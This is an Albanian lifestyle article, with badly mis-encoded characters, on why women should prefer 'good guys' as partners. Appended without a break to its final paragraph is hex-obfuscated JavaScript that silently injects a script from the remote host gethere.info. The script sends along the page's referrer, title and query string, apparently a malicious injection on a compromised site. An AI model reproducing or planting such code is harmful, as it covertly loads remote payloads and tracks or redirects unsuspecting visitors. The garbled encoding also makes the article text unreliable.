f.1105232832818_m (1)

Pse tA� argA�toheni me djem tA� mirA�, kur problematikA�t janA� mA� interesantA�?

NA�se kA�rkoni pA�rgjigje nA� kA�tA� pyetje, ju ofrojmA� disa arsye pse do tA� duhej tA� pA�rcaktoheni pA�r njA� djalA� tA� mirA�.

JanA� tA� kujdesshA�mA�
DjemtA� e mirA� e kuptojnA� agjendA�n tuaj dhe fare mirA� e kuptojnA� kur jeni nervoze apo jeni nA�n stres. Ata thjesht e dinA� se kur e keni njA� ditA� tA� keqe dhe mundohen tA� jenA� mA� tA� kujdesshA�m. Kujdesen tA� jua pA�rmirA�sojnA� disponimin dhe brengosen rreth ndjenjave tuaja. NA� raste tA� tilla mund tA� ju dA�rgojnA� lule apo ndonjA� A�okollatA� pA�r tA� jua bA�rA� me dije se mendojnA� pA�r ju.

JanA� tA� ndjeshA�mA�
DjemtA� e mirA� i A�mojnA� ndjenjat tuaja dhe ju kuptojnA�. NA�se nuk ndiheni mA� sA� miri, do tA� bA�jnA� gjithA�ka pA�r tA� jua zbukuruar ditA�n. Prandaj, A�shtA� kaq e lehtA� tA� martoheni me njA� tA� tillA�, janA� tA� ndjeshA�m dhe kujdesen pA�r ju.

Nuk kanA� frikA� nga emocionetA�
DjemtA� e mirA� janA� shumA� mA� tA� hapur kur janA� nA� pyetje emocionet e tyre. Nuk keni pse tA� mundoheni e tA� mendoheni qA� ta zbuloni se pA�r A�farA� mendojnA�. DjemtA� e mirA� nuk i fshehin emocionet e tyre dhe nuk provojnA� ta��i maskojnA� ato.

Nuk i komplikojnA� gjA�ratA�
Mbajtja e njA� lidhjeje nuk A�shtA� aspak e lehtA�. Nevojitet tA� investoni shumA� mund dhe sinqeritet aty. NA�se kA�rkoni njA� lidhje tA� sinqertA� dhe tA� hapur, njA� djalosh i mirA� A�shtA� zgjedhja e duhur pA�r juve.

DA�shiron tA� jeni tA� lumturA�
DjemtA� e mirA� me tA� vA�rtetA� dA�shirojnA� qA� ju tA� ndiheni mirA� dhe dA�shirojnA� tA� jua zbukurojnA� ditA�n, e jo tA� jua komplikojnA� atA�. Dhe, ajo qA� A�shtA� edhe mA� e rA�ndA�sishme – do t’jua gatuajnA� darkA�n apo do tA� jua bA�jnA� njA� masazh qA� ju tA� ndiheni mA� mirA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}